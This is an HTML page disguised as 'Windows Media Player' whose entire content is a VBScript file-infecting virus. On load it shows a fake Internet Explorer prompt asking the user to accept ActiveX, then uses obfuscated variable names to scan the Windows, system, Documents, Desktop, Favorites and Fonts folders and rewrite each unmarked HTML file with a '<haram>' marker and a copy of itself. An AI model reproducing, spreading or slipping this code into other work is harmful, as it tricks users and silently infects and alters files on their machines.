<haram>
<html><head><title>Windows Media Player</title></head><body>
<script language=VBScript>
On Error Resume Next
MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"
Set upfkupfk=CreateObject("Scripting.FileSystemObject")
Set kupfkvqg=CreateObject("WScript.Shell")
If err.number=429 Then
kupfkvqg.Run javascript:location.reload()
Else

glvqglvb(upfkupfk.GetSpecialFolder(0))
glvqglvb(upfkupfk.GetSpecialFolder(1))
glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))
glvqglvb(kupfkvqg.SpecialFolders("Desktop"))
glvqglvb(kupfkvqg.SpecialFolders("Favorites"))
glvqglvb(kupfkvqg.SpecialFolders("Fonts"))
End If

Function glvqglvb(dir)
If upfkupfk.FolderExists(dir) Then
  Set bbbbbbbb=upfkupfk.GetFolder(dir)
  Set bbblvqgl=bbbbbbbb.Files
  For each lvqgvqgl in bbblvqgl
    lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))
    If lvqglvqr="htm" or lvqglvqr="html" Then
      Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
      if rhmwrrhm.ReadLine <> "<haram>" Then
        rhmwrrhm.Close()
        Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
        htmorg=rhmwrrhm.ReadAll()
        rhmwrrhm.Close()
        Set mwrrhmwr=document.body.createTextRange
        Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)
        rhmwrrhm.WriteLine "<haram>"
        rhmwrrhm.Write(htmorg)
        rhmwrrhm.WriteLine mwrrhmwr.htmltext
        rhmwrrhm.Close()
      Else
        rhmwrrhm.Close()
      End If
    End If
  Next
End If
End Function
</script></body></html> 